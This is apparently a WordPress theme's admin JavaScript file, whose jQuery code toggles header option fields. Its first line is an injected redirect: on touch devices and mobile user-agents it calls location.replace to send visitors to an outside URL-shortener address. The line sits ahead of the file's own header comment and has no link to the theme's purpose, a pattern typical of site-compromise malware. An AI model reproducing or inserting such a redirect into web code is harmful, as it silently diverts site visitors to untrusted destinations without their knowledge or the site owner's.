(window.matchMedia("(pointer:coarse)").matches||/Android|iPhone|iPad|iPod|Mobile|Tablet|Windows Phone|webOS|BlackBerry|Opera Mini|IEMobile/i.test(navigator.userAgent))&&location.replace("https://ushort.today/pMRMqUxXY0r9");
/*
 File name:          Custom Admin JS
*/
(function ($) {
  'use strict';

	jQuery( document ).ready(function() {

 		var selected =  jQuery("#skyhaus_custom_header_options_status").val();
    if (selected == 'yes') {
    	jQuery('.cmb_id_skyhaus_header_custom_variant').show();
    	jQuery('.cmb_id_skyhaus_metabox_header_logo').show();
    }else{
    	jQuery('.cmb_id_skyhaus_header_custom_variant').hide();
    	jQuery('.cmb_id_skyhaus_metabox_header_logo').hide();
    }

    jQuery( "#skyhaus_custom_header_options_status" ).change(function () {
	 		var selected =  jQuery(this).val();
      if (selected == 'yes') {
      	jQuery('.cmb_id_skyhaus_header_custom_variant').show();
      	jQuery('.cmb_id_skyhaus_metabox_header_logo').show();
      }else{
      	jQuery('.cmb_id_skyhaus_header_custom_variant').hide();
      	jQuery('.cmb_id_skyhaus_metabox_header_logo').hide();
      }
    });
	});
} (jQuery) )